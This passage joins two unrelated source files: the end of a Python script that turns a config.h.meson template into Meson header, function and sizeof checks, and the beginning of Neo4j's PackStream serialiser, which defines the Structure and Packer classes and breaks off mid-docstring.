     'HAVE_GETLINE': ('getline', 'stdio.h'),
     'HAVE_LINK': ('link', 'unistd.h'),
     'HAVE_RAISE': ('raise', 'signal.h'),
     'HAVE_STRNDUP': ('strndup', 'string.h'),
     'HAVE_SCHED_GETAFFINITY': ('sched_getaffinity', 'sched.h'),
     'HAVE_WAITPID': ('waitpid', 'sys/wait.h'),
     'HAVE_XRENDERCREATECONICALGRADIENT': ('XRenderCreateConicalGradient', 'xcb/render.h'),
     'HAVE_XRENDERCREATELINEARGRADIENT': ('XRenderCreateLinearGradient', 'xcb/render.h'),
     'HAVE_XRENDERCREATERADIALGRADIENT': ('XRenderCreateRadialGradient', 'xcb/render.h'),
     'HAVE_XRENDERCREATESOLIDFILL': ('XRenderCreateSolidFill', 'xcb/render.h'),
     'HAVE_DCGETTEXT': ('dcgettext', 'libintl.h'),
     'HAVE_ENDMNTENT': ('endmntent', 'mntent.h'),
     'HAVE_ENDSERVENT': ('endservent', 'netdb.h'),
     'HAVE_EVENTFD': ('eventfd', 'sys/eventfd.h'),
     'HAVE_FALLOCATE': ('fallocate', 'fcntl.h'),
     'HAVE_FCHMOD': ('fchmod', 'sys/stat.h'),
     'HAVE_FCHOWN': ('fchown', 'unistd.h'),
     'HAVE_FDWALK': ('fdwalk', 'stdlib.h'),
     'HAVE_FSYNC': ('fsync', 'unistd.h'),
     'HAVE_GETC_UNLOCKED': ('getc_unlocked', 'stdio.h'),
     'HAVE_GETFSSTAT': ('getfsstat', 'sys/mount.h'),
     'HAVE_GETMNTENT_R': ('getmntent_r', 'mntent.h'),
     'HAVE_GETPROTOBYNAME_R': ('getprotobyname_r', 'netdb.h'),
     'HAVE_GETRESUID': ('getresuid', 'unistd.h'),
     'HAVE_GETVFSSTAT': ('getvfsstat', 'sys/statvfs.h'),
     'HAVE_GMTIME_R': ('gmtime_r', 'time.h'),
     'HAVE_HASMNTOPT': ('hasmntopt', 'mntent.h'),
     'HAVE_IF_INDEXTONAME': ('if_indextoname', 'net/if.h'),
     'HAVE_IF_NAMETOINDEX': ('if_nametoindex', 'net/if.h'),
     'HAVE_INOTIFY_INIT1': ('inotify_init1', 'sys/inotify.h'),
     'HAVE_ISSETUGID': ('issetugid', 'unistd.h'),
     'HAVE_KEVENT': ('kevent', 'sys/event.h'),
     'HAVE_KQUEUE': ('kqueue', 'sys/event.h'),
     'HAVE_LCHMOD': ('lchmod', 'sys/stat.h'),
     'HAVE_LCHOWN': ('lchown', 'unistd.h'),
     'HAVE_LSTAT': ('lstat', 'sys/stat.h'),
     'HAVE_MEMCPY': ('memcpy', 'string.h'),
     'HAVE_MEMALIGN': ('memalign', 'stdlib.h'),
     'HAVE_MEMMEM': ('memmem', 'string.h'),
     'HAVE_NEWLOCALE': ('newlocale', 'locale.h'),
     'HAVE_PIPE2': ('pipe2', 'fcntl.h'),
     'HAVE_POLL': ('poll', 'poll.h'),
     'HAVE_PRLIMIT': ('prlimit', 'sys/resource.h'),
     'HAVE_PTHREAD_ATTR_SETSTACKSIZE': ('pthread_attr_setstacksize', 'pthread.h'),
     'HAVE_PTHREAD_CONDATTR_SETCLOCK': ('pthread_condattr_setclock', 'pthread.h'),
     'HAVE_PTHREAD_COND_TIMEDWAIT_RELATIVE_NP': ('pthread_cond_timedwait_relative_np', 'pthread.h'),
     'HAVE_READLINK': ('readlink', 'unistd.h'),
     'HAVE_RES_INIT': ('res_init', 'resolv.h'),
     'HAVE_SENDMMSG': ('sendmmsg', 'sys/socket.h'),
     'HAVE_SOCKET': ('socket', 'sys/socket.h'),
     'HAVE_GETENV': ('getenv', 'stdlib.h'),
     'HAVE_SETENV': ('setenv', 'stdlib.h'),
     'HAVE_PUTENV': ('putenv', 'stdlib.h'),
     'HAVE_UNSETENV': ('unsetenv', 'stdlib.h'),
     'HAVE_SETMNTENT': ('setmntent', 'mntent.h'),
     'HAVE_SNPRINTF': ('snprintf', 'stdio.h'),
     'HAVE_SPLICE': ('splice', 'fcntl.h'),
     'HAVE_STATFS': ('statfs', 'mount.h'),
     'HAVE_STATVFS': ('statvfs', 'sys/statvfs.h'),
     'HAVE_STPCOPY': ('stpcopy', 'string.h'),  # NOTE(review): libc has stpcpy, not stpcopy - confirm intended name
     'HAVE_STRCASECMP': ('strcasecmp', 'strings.h'),
     'HAVE_STRLCPY': ('strlcpy', 'string.h'),
     'HAVE_STRNCASECMP': ('strncasecmp', 'strings.h'),
     'HAVE_STRSIGNAL': ('strsignal', 'signal.h'),
     'HAVE_STRTOD_L': ('strtod_l', 'stdlib.h'),
     'HAVE_STRTOLL_L': ('strtoll_l', 'stdlib.h'),
     'HAVE_STRTOULL_L': ('strtoull_l', 'stdlib.h'),
     'HAVE_SYMLINK': ('symlink', 'unistd.h'),
     'HAVE_SYSCTLBYNAME': ('sysctlbyname', 'sys/sysctl.h'),
     'HAVE_TIMEGM': ('timegm', 'time.h'),
     'HAVE_USELOCALE': ('uselocale', 'xlocale.h'),
     'HAVE_UTIMES': ('utimes', 'sys/time.h'),
     'HAVE_VALLOC': ('valloc', 'stdlib.h'),
     'HAVE_VASPRINTF': ('vasprintf', 'stdio.h'),
     'HAVE_VSNPRINTF': ('vsnprintf', 'stdio.h'),
     'HAVE_BCOPY': ('bcopy', 'strings.h'),
     'HAVE_STRERROR': ('strerror', 'string.h'),
     'HAVE_MEMMOVE': ('memmove', 'string.h'),
     'HAVE_STRTOIMAX': ('strtoimax', 'inttypes.h'),
     'HAVE_STRTOLL': ('strtoll', 'stdlib.h'),
     'HAVE_STRTOQ': ('strtoq', 'stdlib.h'),
     'HAVE_ACCEPT4': ('accept4', 'sys/socket.h'),
     'HAVE_CHMOD': ('chmod', 'sys/stat.h'),
     'HAVE_CHOWN': ('chown', 'unistd.h'),
     'HAVE_FSTAT': ('fstat', 'sys/stat.h'),
     'HAVE_GETADDRINFO': ('getaddrinfo', 'netdb.h'),
     'HAVE_GETGRGID_R': ('getgrgid_r', 'grp.h'),
     'HAVE_GETGRNAM_R': ('getgrnam_r', 'grp.h'),
     'HAVE_GETGROUPS': ('getgroups', 'grp.h'),
     'HAVE_GETOPT_LONG': ('getopt_long', 'getopt.h'),
     'HAVE_GETPWNAM_R': ('getpwnam_r', 'pwd.h'),  # fixed: was 'getpwnam', which tested the wrong (non-reentrant) function
     'HAVE_GETPWUID_R': ('getpwuid_r', 'pwd.h'),
     'HAVE_GETUID': ('getuid', 'unistd.h'),
     'HAVE_LRINTF': ('lrintf', 'math.h'),
     'HAVE_DECL_ISNAN': ('isnan', 'math.h'),
     'HAVE_DECL_ISINF': ('isinf', 'math.h'),
     'HAVE_ROUND': ('round', 'math.h'),
     'HAVE_NEARBYINT': ('nearbyint', 'math.h'),
     'HAVE_RINT': ('rint', 'math.h'),
     'HAVE_MKFIFO': ('mkfifo', 'sys/stat.h'),
     'HAVE_MLOCK': ('mlock', 'sys/mman.h'),
     'HAVE_NANOSLEEP': ('nanosleep', 'time.h'),
     'HAVE_PIPE': ('pipe', 'unistd.h'),
     'HAVE_PPOLL': ('ppoll', 'poll.h'),
     'HAVE_REGEXEC': ('regexec', 'regex.h'),
     'HAVE_SETEGID': ('setegid', 'unistd.h'),
     'HAVE_SETEUID': ('seteuid', 'unistd.h'),
     'HAVE_SETPGID': ('setpgid', 'unistd.h'),
     'HAVE_SETREGID': ('setregid', 'unistd.h'),
     'HAVE_SETRESGID': ('setresgid', 'unistd.h'),
     'HAVE_SETRESUID': ('setresuid', 'unistd.h'),
     'HAVE_SHM_OPEN': ('shm_open', 'fcntl.h'),
     'HAVE_SLEEP': ('sleep', 'unistd.h'),
     'HAVE_STRERROR_R': ('strerror_r', 'string.h'),
     'HAVE_STRTOF': ('strtof', 'stdlib.h'),
     'HAVE_SYSCONF': ('sysconf', 'unistd.h'),
     'HAVE_USLEEP': ('usleep', 'unistd.h'),
     'HAVE_VFORK': ('vfork', 'unistd.h'),
     'HAVE_MALLOC': ('malloc', 'stdlib.h'),
     'HAVE_CALLOC': ('calloc', 'stdlib.h'),
     'HAVE_REALLOC': ('realloc', 'stdlib.h'),
     'HAVE_FREE': ('free', 'stdlib.h'),
     'HAVE_ALLOCA': ('alloca', 'alloca.h'),
     'HAVE_QSORT': ('qsort', 'stdlib.h'),
     'HAVE_ABS': ('abs', 'stdlib.h'),
     'HAVE_MEMSET': ('memset', 'string.h'),
     'HAVE_MEMCMP': ('memcmp', 'string.h'),
     'HAVE_STRLEN': ('strlen', 'string.h'),
     'HAVE_STRLCAT': ('strlcat', 'string.h'),
     'HAVE_STRDUP': ('strdup', 'string.h'),
     'HAVE__STRREV': ('_strrev', 'string.h'),
     'HAVE__STRUPR': ('_strupr', 'string.h'),
     'HAVE__STRLWR': ('_strlwr', 'string.h'),
     'HAVE_INDEX': ('index', 'strings.h'),
     'HAVE_RINDEX': ('rindex', 'strings.h'),
     'HAVE_STRCHR': ('strchr', 'string.h'),
     'HAVE_STRRCHR': ('strrchr', 'string.h'),
     'HAVE_STRSTR': ('strstr', 'string.h'),
     'HAVE_STRTOL': ('strtol', 'stdlib.h'),
     'HAVE_STRTOUL': ('strtoul', 'stdlib.h'),
     'HAVE_STRTOULL': ('strtoull', 'stdlib.h'),
     'HAVE_STRTOD': ('strtod', 'stdlib.h'),
     'HAVE_ATOI': ('atoi', 'stdlib.h'),
     'HAVE_ATOF': ('atof', 'stdlib.h'),
     'HAVE_STRCMP': ('strcmp', 'string.h'),
     'HAVE_STRNCMP': ('strncmp', 'string.h'),
     'HAVE_VSSCANF': ('vsscanf', 'stdio.h'),
     'HAVE_CHROOT': ('chroot', 'unistd.h'),
     'HAVE_CLOCK': ('clock', 'time.h'),
     'HAVE_CLOCK_GETRES': ('clock_getres', 'time.h'),
     'HAVE_CLOCK_GETTIME': ('clock_gettime', 'time.h'),
     'HAVE_CLOCK_SETTIME': ('clock_settime', 'time.h'),
     'HAVE_CONFSTR': ('confstr', 'time.h'),
     'HAVE_CTERMID': ('ctermid', 'stdio.h'),
     'HAVE_DIRFD': ('dirfd', 'dirent.h'),
     'HAVE_DLOPEN': ('dlopen', 'dlfcn.h'),
     'HAVE_DUP2': ('dup2', 'unistd.h'),
     'HAVE_DUP3': ('dup3', 'unistd.h'),
     'HAVE_EPOLL_CREATE1': ('epoll_create1', 'sys/epoll.h'),
     'HAVE_ERF': ('erf', 'math.h'),
     'HAVE_ERFC': ('erfc', 'math.h'),
     'HAVE_EXECV': ('execv', 'unistd.h'),
     'HAVE_FACCESSAT': ('faccessat', 'unistd.h'),
     'HAVE_FCHDIR': ('fchdir', 'unistd.h'),
     'HAVE_FCHMODAT': ('fchmodat', 'sys/stat.h'),
     'HAVE_FDATASYNC': ('fdatasync', 'unistd.h'),
     'HAVE_FDOPENDIR': ('fdopendir', 'dirent.h'),
     'HAVE_FEXECVE': ('fexecve', 'unistd.h'),
     'HAVE_FLOCK': ('flock', 'sys/file.h'),
     'HAVE_FORKPTY': ('forkpty', 'pty.h'),
     'HAVE_FPATHCONF': ('fpathconf', 'unistd.h'),
     'HAVE_FSTATAT': ('fstatat', 'unistd.h'),
     'HAVE_FSTATVFS': ('fstatvfs', 'sys/statvfs.h'),
     'HAVE_FTELLO': ('ftello', 'stdio.h'),
     'HAVE_FTIME': ('ftime', 'sys/timeb.h'),
     'HAVE_FTRUNCATE': ('ftruncate', 'unistd.h'),
     'HAVE_FUTIMENS': ('futimens', 'sys/stat.h'),
     'HAVE_FUTIMES': ('futimes', 'sys/time.h'),
     'HAVE_GAI_STRERROR': ('gai_strerror', 'netdb.h'),
     'HAVE_GETGROUPLIST': ('getgrouplist', 'grp.h'),
     'HAVE_GETHOSTBYNAME': ('gethostbyname', 'netdb.h'),
     'HAVE_GETHOSTBYNAME_R': ('gethostbyname_r', 'netdb.h'),
     'HAVE_GETITIMER': ('getitimer', 'sys/time.h'),
     'HAVE_GETLOADAVG': ('getloadavg', 'stdlib.h'),
     'HAVE_GETLOGIN': ('getlogin', 'unistd.h'),
     'HAVE_GETNAMEINFO': ('getnameinfo', 'netdb.h'),
     'HAVE_GETPEERNAME': ('getpeername', 'sys/socket.h'),
     'HAVE_GETPGID': ('getpgid', 'unistd.h'),
     'HAVE_GETPGRP': ('getpgrp', 'unistd.h'),
     'HAVE_GETPID': ('getpid', 'unistd.h'),
     'HAVE_GETPRIORITY': ('getpriority', 'sys/resource.h'),
     'HAVE_GETPWENT': ('getpwent', 'pwd.h'),
     'HAVE_GETRANDOM': ('getrandom', 'linux/random.h'),
     'HAVE_GETRESGID': ('getresgid', 'unistd.h'),
     'HAVE_GETSID': ('getsid', 'unistd.h'),
     'HAVE_GETSPENT': ('getspent', 'shadow.h'),
     'HAVE_GETSPNAM': ('getspnam', 'shadow.h'),
     'HAVE_GETWD': ('getwd', 'unistd.h'),
     'HAVE_HSTRERROR': ('hstrerror', 'netdb.h'),
     'HAVE_HTOLE64': ('htole64', 'endian.h'),
     'HAVE_IF_NAMEINDEX': ('if_nameindex', 'net/if.h'),
     'HAVE_INET_ATON': ('inet_aton', 'arpa/inet.h'),
     'HAVE_INET_PTON': ('inet_pton', 'arpa/inet.h'),
     'HAVE_INITGROUPS': ('initgroups', 'grp.h'),
     'HAVE_KILL': ('kill', 'signal.h'),
     'HAVE_KILLPG': ('killpg', 'signal.h'),
     'HAVE_LINKAT': ('linkat', 'unistd.h'),
     'HAVE_LOCKF': ('lockf', 'unistd.h'),
     'HAVE_LUTIMES': ('lutimes', 'sys/time.h'),
     'HAVE_MAKEDEV': ('makedev', 'sys/sysmacros.h'),
     'HAVE_MBRTOWC': ('mbrtowc', 'wchar.h'),
     'HAVE_MEMRCHR': ('memrchr', 'string.h'),
     'HAVE_MKDIRAT': ('mkdirat', 'sys/stat.h'),
     'HAVE_MKFIFOAT': ('mkfifoat', 'sys/stat.h'),
     'HAVE_MKNOD': ('mknod', 'unistd.h'),
     'HAVE_MKNODAT': ('mknodat', 'unistd.h'),
     'HAVE_MKTIME': ('mktime', 'unistd.h'),  # NOTE(review): mktime is declared in time.h - confirm header
     'HAVE_MKREMAP': ('mkremap', 'sys/mman.h'),  # NOTE(review): possibly meant mremap - confirm intended name
     'HAVE_NICE': ('nice', 'unistd.h'),
     'HAVE_OPENAT': ('openat', 'fcntl.h'),
     'HAVE_OPENPTY': ('openpty', 'pty.h'),
     'HAVE_PATHCONF': ('pathconf', 'unistd.h'),
     'HAVE_PAUSE': ('pause', 'unistd.h'),
     'HAVE_PREAD': ('pread', 'unistd.h'),
     'HAVE_PTHREAD_KILL': ('pthread_kill', 'signal.h'),
     'HAVE_PTHREAD_SIGMASK': ('pthread_sigmask', 'signal.h'),
     'HAVE_PWRITE': ('pwrite', 'unistd.h'),
     'HAVE_READLINKAT': ('readlinkat', 'unistd.h'),
     'HAVE_READV': ('readv', 'sys/uio.h'),
     'HAVE_RENAMEAT': ('renameat', 'stdio.h'),  # fixed: was 'renamat' (typo), so the check could never succeed
     'HAVE_SCHED_GET_PRIORITY_MAX': ('sched_get_priority_max', 'sched.h'),
     'HAVE_SCHED_RR_GET_INTERVAL': ('sched_rr_get_interval', 'sched.h'),
     'HAVE_SCHED_SETAFFINITY': ('sched_setaffinity', 'sched.h'),
     'HAVE_SCHED_SETPARAM': ('sched_setparam', 'sched.h'),
     'HAVE_SCHED_SETSCHEDULER': ('sched_setscheduler', 'sched.h'),
     'HAVE_SELECT': ('select', 'sys/select.h'),
     'HAVE_SEM_GETVALUE': ('sem_getvalue', 'semaphore.h'),
     'HAVE_SEM_OPEN': ('sem_open', 'semaphore.h'),
     'HAVE_SEM_TIMEDWAIT': ('sem_timedwait', 'semaphore.h'),
     'HAVE_SEM_UNLINK': ('sem_unlink', 'semaphore.h'),
     'HAVE_SENDFILE': ('sendfile', 'sys/sendfile.h'),
     'HAVE_SETGID': ('setgid', 'unistd.h'),
     'HAVE_SETGROUPS': ('setgroups', 'grp.h'),
     'HAVE_SETHOSTNAME': ('sethostname', 'unistd.h'),
     'HAVE_SETITIMER': ('setitimer', 'sys/time.h'),
     'HAVE_SETLOCALE': ('setlocale', 'locale.h'),
     'HAVE_SETPGRP': ('setpgrp', 'unistd.h'),
     'HAVE_SETPRIORITY': ('setpriority', 'sys/resource.h'),
     'HAVE_SETREUID': ('setreuid', 'unistd.h'),
     'HAVE_SETSID': ('setsid', 'unistd.h'),
     'HAVE_SETUID': ('setuid', 'unistd.h'),
     'HAVE_SETVBUF': ('setvbuf', 'unistd.h'),
     'HAVE_SIGALTSTACK': ('sigaltstack', 'signal.h'),
     'HAVE_SIGINTERRUPT': ('siginterrupt', 'signal.h'),
     'HAVE_SIGPENDING': ('sigpending', 'signal.h'),
     'HAVE_SIGRELSE': ('sigrelse', 'signal.h'),
     'HAVE_SIGTIMEDWAIT': ('sigtimedwait', 'signal.h'),
     'HAVE_SIGWAIT': ('sigwait', 'signal.h'),
     'HAVE_SIGWAITINFO': ('sigwaitinfo', 'signal.h'),
     'HAVE_SOCKETPAIR': ('socketpair', 'sys/socket.h'),
     'HAVE_STRFTIME': ('strftime', 'time.h'),
     'HAVE_SYMLINKAT': ('symlinkat', 'unistd.h'),
     'HAVE_SYNC': ('sync', 'unistd.h'),
     'HAVE_TCGETPGRP': ('tcgetpgrp', 'unistd.h'),
     'HAVE_TCSETPGRP': ('tcsetpgrp', 'unistd.h'),
     'HAVE_TEMPNAM': ('tempnam', 'stdio.h'),
     'HAVE_TIMES': ('times', 'sys/times.h'),
     'HAVE_TEMPFILE': ('tempfile', 'stdio.h'),
     'HAVE_TMPNAM': ('tmpnam', 'stdio.h'),
     'HAVE_TMPNAM_R': ('tmpnam_r', 'stdio.h'),
     'HAVE_TRUNCATE': ('truncate', 'unistd.h'),
     'HAVE_TZNAME': ('tzname', 'time.h'),
     'HAVE_UNAME': ('uname', 'sys/utsname.h'),
     'HAVE_UNLINKAT': ('unlinkat', 'unistd.h'),
     'HAVE_UTIMENSAT': ('utimensat', 'sys/stat.h'),
     'HAVE_WAIT3': ('wait3', 'sys/wait.h'),
     'HAVE_WAIT4': ('wait4', 'sys/wait.h'),
     'HAVE_WAITID': ('waitid', 'sys/wait.h'),
     'HAVE_WRITEV': ('writev', 'sys/uio.h'),
     'HAVE_WMEMCMP': ('wmemcmp', 'wchar.h'),
     'HAVE_ATAN': ('atan', 'math.h'),
     'HAVE_ATAN2': ('atan2', 'math.h'),
     'HAVE_ACOS': ('acos', 'math.h'),
     'HAVE_ACOSH': ('acosh', 'math.h'),
     'HAVE_ASIN': ('asin', 'math.h'),
     'HAVE_ASINH': ('asinh', 'math.h'),
     'HAVE_ATANH': ('atanh', 'math.h'),
     'HAVE_CEIL': ('ceil', 'math.h'),
     'HAVE_COPYSIGN': ('copysign', 'math.h'),
     'HAVE_COS': ('cos', 'math.h'),
     'HAVE_COSH': ('cosh', 'math.h'),
     'HAVE_COSF': ('cosf', 'math.h'),
     'HAVE_EXPM1': ('expm1', 'math.h'),
     'HAVE_FABS': ('fabs', 'math.h'),
     'HAVE_FINITE': ('finite', 'math.h'),
     'HAVE_FLOOR': ('floor', 'math.h'),
     'HAVE_GAMMA': ('gamma', 'math.h'),
     'HAVE_HYPOT': ('hypot', 'math.h'),
     'HAVE_ISINF': ('isinf', 'math.h'),
     'HAVE_LOG': ('log', 'math.h'),
     'HAVE_LOG1P': ('log1p', 'math.h'),
     'HAVE_LOG2': ('log2', 'math.h'),
     'HAVE_LGAMMA': ('lgamma', 'math.h'),
     'HAVE_POW': ('pow', 'math.h'),
     'HAVE_SCALBN': ('scalbn', 'math.h'),
     'HAVE_SIN': ('sin', 'math.h'),
     'HAVE_SINF': ('sinf', 'math.h'),
     'HAVE_SINH': ('sinh', 'math.h'),
     'HAVE_SQRT': ('sqrt', 'math.h'),
     'HAVE_TGAMMA': ('tgamma', 'math.h'),
     'HAVE_FSEEKO': ('fseeko', 'stdio.h'),
     'HAVE_FSEEKO64': ('fseeko64', 'stdio.h'),
     'HAVE_SETJMP': ('setjmp', 'setjmp.h'),
     'HAVE_PTHREAD_SETNAME_NP': ('pthread_setname_np', 'pthread.h'),
     'HAVE_PTHREAD_SET_NAME_NP': ('pthread_set_name_np', 'pthread.h'),
     }
headers = []    # (token, header path) pairs, e.g. ('HAVE_SYS_TIME_H', 'sys/time.h')
functions = []  # [token, func, header] for known checks, [token] for unknown HAVE_* macros
sizes = []      # (token, C type name) pairs from SIZEOF_* defines
if len(sys.argv) != 2:
    print(help_message.format(sys.argv[0]))
    sys.exit(0)  # NOTE(review): exits 0 even on bad usage; kept for compatibility
with open(sys.argv[1]) as f:
    for line in f:
        line = line.strip()
        arr = line.split()
        # Check for headers: HAVE_FOO_BAR_H -> foo/bar.h
        if line.startswith('#mesondefine') and line.endswith('_H'):
            token = arr[1]
            tarr = token.split('_')[1:-1]  # drop leading HAVE and trailing H
            tarr = [x.lower() for x in tarr]
            hname = '/'.join(tarr) + '.h'
            headers.append((token, hname))
        # Check for functions.
        try:
            token = arr[1]
            if token in function_data:
                fdata = function_data[token]
                functions.append([token, fdata[0], fdata[1]])
            elif token.startswith('HAVE_') and not token.endswith('_H'):
                # Unknown function macro: emitted below as a commented placeholder.
                functions.append([token])
        except IndexError:
            # Line has fewer than two tokens; nothing to inspect.
            pass
        # Check for sizeof tests.
        if len(arr) != 2:
            continue
        elem = arr[1]
        if elem.startswith('SIZEOF_'):
            # SIZEOF_UNSIGNED_INT_P -> "unsigned int*", SIZEOF_SIZE_T -> "size_t"
            typename = elem.split('_', 1)[1] \
                .replace('_P', '*') \
                .replace('_', ' ') \
                .lower() \
                .replace('size t', 'size_t')
            sizes.append((elem, typename))
# Emit the Meson snippet on stdout.
print('''cc = meson.get_compiler('c')
cdata = configuration_data()''')
# Convert header checks.
print('check_headers = [')
for token, hname in headers:
    print(" ['{}', '{}'],".format(token, hname))
print(']\n')
print('''foreach h : check_headers
if cc.has_header(h.get(1))
cdata.set(h.get(0), 1)
endif
endforeach
''')
# Convert function checks.
print('check_functions = [')
for tok in functions:
    if len(tok) == 3:
        tokstr, fdata0, fdata1 = tok
        print(" ['{}', '{}', '#include<{}>'],".format(tokstr, fdata0, fdata1))
    else:
        # No known signature; leave a comment for the maintainer to resolve.
        print('# check token', tok)
print(']\n')
print('''foreach f : check_functions
if cc.has_function(f.get(1), prefix : f.get(2))
cdata.set(f.get(0), 1)
endif
endforeach
''')
# Convert sizeof checks.
for elem, typename in sizes:
    print("cdata.set('{}', cc.sizeof('{}'))".format(elem, typename))
print('''
configure_file(input : 'config.h.meson',
output : 'config.h',
configuration : cdata)''')
|
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright (c) 2002-2019 "Neo4j,"
# Neo4j Sweden AB [http://neo4j.com]
#
# This file is part of Neo4j.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from codecs import decode
from io import BytesIO
from struct import pack as struct_pack, unpack as struct_unpack
# Lookup tables: precomputed big-endian encodings for every 8-/16-bit unsigned
# value, so the packer can index a list instead of calling struct.pack per value.
PACKED_UINT_8 = [struct_pack(">B", value) for value in range(0x100)]
PACKED_UINT_16 = [struct_pack(">H", value) for value in range(0x10000)]
# Reverse tables mapping raw bytes back to integers.
UNPACKED_UINT_8 = {bytes(bytearray([x])): x for x in range(0x100)}
UNPACKED_UINT_16 = {struct_pack(">H", x): x for x in range(0x10000)}
# Single-byte markers with fixed meanings: null, booleans, tiny positive ints
# (0x00-0x7F) and tiny negative ints (0xF0-0xFF encode -16..-1).
UNPACKED_MARKERS = {b"\xC0": None, b"\xC2": False, b"\xC3": True}
UNPACKED_MARKERS.update({bytes(bytearray([z])): z for z in range(0x00, 0x80)})
UNPACKED_MARKERS.update({bytes(bytearray([z + 256])): z for z in range(-0x10, 0x00)})
# Bounds of a signed 64-bit integer, the widest PackStream integer encoding.
INT64_MIN = -(2 ** 63)
INT64_MAX = 2 ** 63
# Sentinel returned/compared when a streamed collection terminates (0xDF).
EndOfStream = object()
class Structure:
    """ A PackStream structure: a one-byte tag identifying the structure
    type plus an ordered, mutable list of fields.
    """

    def __init__(self, tag, *fields):
        self.tag = tag
        self.fields = list(fields)

    def __repr__(self):
        rendered_fields = ", ".join(repr(field) for field in self.fields)
        return "Structure[0x%02X](%s)" % (ord(self.tag), rendered_fields)

    def __eq__(self, other):
        # Structures compare equal when both tag and fields match; objects
        # lacking either attribute are simply unequal.
        try:
            return self.tag == other.tag and self.fields == other.fields
        except AttributeError:
            return False

    def __ne__(self, other):
        return not self.__eq__(other)

    def __len__(self):
        # Length is the number of fields, excluding the tag.
        return len(self.fields)

    def __getitem__(self, key):
        return self.fields[key]

    def __setitem__(self, key, value):
        self.fields[key] = value
class Packer:
    """ Serialises Python values into PackStream bytes on the wrapped stream.

    Supported types: None, bool, float, int (signed 64-bit range), str,
    bytes/bytearray, list, dict and Structure.  The previous sixteen-branch
    elif chains for tiny string/list/map/struct markers are collapsed into a
    single PACKED_UINT_8[base + size] lookup, which writes the identical
    marker byte (e.g. 0x80 + size for a tiny string).
    """

    def __init__(self, stream):
        self.stream = stream
        self._write = self.stream.write  # bound once; hot paths call it directly

    def pack_raw(self, data):
        """ Write raw bytes to the stream without any header. """
        self._write(data)

    def pack(self, value):
        """ Pack a single value, dispatching on its type. """
        return self._pack(value)

    def _pack(self, value):
        write = self._write
        # None
        if value is None:
            write(b"\xC0")  # NULL
        # Boolean (checked before int: bool is an int subclass)
        elif value is True:
            write(b"\xC3")
        elif value is False:
            write(b"\xC2")
        # Float (only double precision is supported)
        elif isinstance(value, float):
            write(b"\xC1")
            write(struct_pack(">d", value))
        # Integer: use the smallest encoding that represents the value
        elif isinstance(value, int):
            if -0x10 <= value < 0x80:
                write(PACKED_UINT_8[value % 0x100])  # tiny int, single byte
            elif -0x80 <= value < -0x10:
                write(b"\xC8")  # INT_8
                write(PACKED_UINT_8[value % 0x100])
            elif -0x8000 <= value < 0x8000:
                write(b"\xC9")  # INT_16
                write(PACKED_UINT_16[value % 0x10000])
            elif -0x80000000 <= value < 0x80000000:
                write(b"\xCA")  # INT_32
                write(struct_pack(">i", value))
            elif INT64_MIN <= value < INT64_MAX:
                write(b"\xCB")  # INT_64
                write(struct_pack(">q", value))
            else:
                raise OverflowError("Integer %s out of range" % value)
        # String
        elif isinstance(value, str):
            encoded = value.encode("utf-8")
            self.pack_string_header(len(encoded))
            self.pack_raw(encoded)
        # Bytes
        elif isinstance(value, bytes):
            self.pack_bytes_header(len(value))
            self.pack_raw(value)
        elif isinstance(value, bytearray):
            self.pack_bytes_header(len(value))
            self.pack_raw(bytes(value))
        # List
        elif isinstance(value, list):
            self.pack_list_header(len(value))
            for item in value:
                self._pack(item)
        # Map
        elif isinstance(value, dict):
            self.pack_map_header(len(value))
            for key, item in value.items():
                self._pack(key)
                self._pack(item)
        # Structure
        elif isinstance(value, Structure):
            self.pack_struct(value.tag, value.fields)
        # Other
        else:
            raise ValueError("Values of type %s are not supported" % type(value))

    def pack_bytes_header(self, size):
        """ Write a BYTES_8/16/32 header for a payload of *size* bytes. """
        write = self._write
        if size < 0x100:
            write(b"\xCC")  # BYTES_8
            write(PACKED_UINT_8[size])
        elif size < 0x10000:
            write(b"\xCD")  # BYTES_16
            write(PACKED_UINT_16[size])
        elif size < 0x100000000:
            write(b"\xCE")  # BYTES_32
            write(struct_pack(">I", size))
        else:
            raise OverflowError("Bytes header size out of range")

    def pack_string_header(self, size):
        """ Write a string header: a tiny marker for sizes < 16, otherwise
        STRING_8/16/32 followed by an explicit length.
        """
        write = self._write
        if size < 0x10:
            # TINY_STRING: the size is encoded in the marker byte (0x80-0x8F)
            write(PACKED_UINT_8[0x80 + size])
        elif size < 0x100:
            write(b"\xD0")  # STRING_8
            write(PACKED_UINT_8[size])
        elif size < 0x10000:
            write(b"\xD1")  # STRING_16
            write(PACKED_UINT_16[size])
        elif size < 0x100000000:
            write(b"\xD2")  # STRING_32
            write(struct_pack(">I", size))
        else:
            raise OverflowError("String header size out of range")

    def pack_list_header(self, size):
        """ Write a list header: a tiny marker for sizes < 16, otherwise
        LIST_8/16/32 followed by an explicit length.
        """
        write = self._write
        if size < 0x10:
            # TINY_LIST: the size is encoded in the marker byte (0x90-0x9F)
            write(PACKED_UINT_8[0x90 + size])
        elif size < 0x100:
            write(b"\xD4")  # LIST_8
            write(PACKED_UINT_8[size])
        elif size < 0x10000:
            write(b"\xD5")  # LIST_16
            write(PACKED_UINT_16[size])
        elif size < 0x100000000:
            write(b"\xD6")  # LIST_32
            write(struct_pack(">I", size))
        else:
            raise OverflowError("List header size out of range")

    def pack_list_stream_header(self):
        """ Write the open marker for a list of unknown length. """
        self._write(b"\xD7")

    def pack_map_header(self, size):
        """ Write a map header: a tiny marker for sizes < 16, otherwise
        MAP_8/16/32 followed by an explicit length.
        """
        write = self._write
        if size < 0x10:
            # TINY_MAP: the size is encoded in the marker byte (0xA0-0xAF)
            write(PACKED_UINT_8[0xA0 + size])
        elif size < 0x100:
            write(b"\xD8")  # MAP_8
            write(PACKED_UINT_8[size])
        elif size < 0x10000:
            write(b"\xD9")  # MAP_16
            write(PACKED_UINT_16[size])
        elif size < 0x100000000:
            write(b"\xDA")  # MAP_32
            write(struct_pack(">I", size))
        else:
            raise OverflowError("Map header size out of range")

    def pack_map_stream_header(self):
        """ Write the open marker for a map of unknown length. """
        self._write(b"\xDB")

    def pack_struct(self, signature, fields):
        """ Write a structure: tiny marker (0xB0 + size), the one-byte
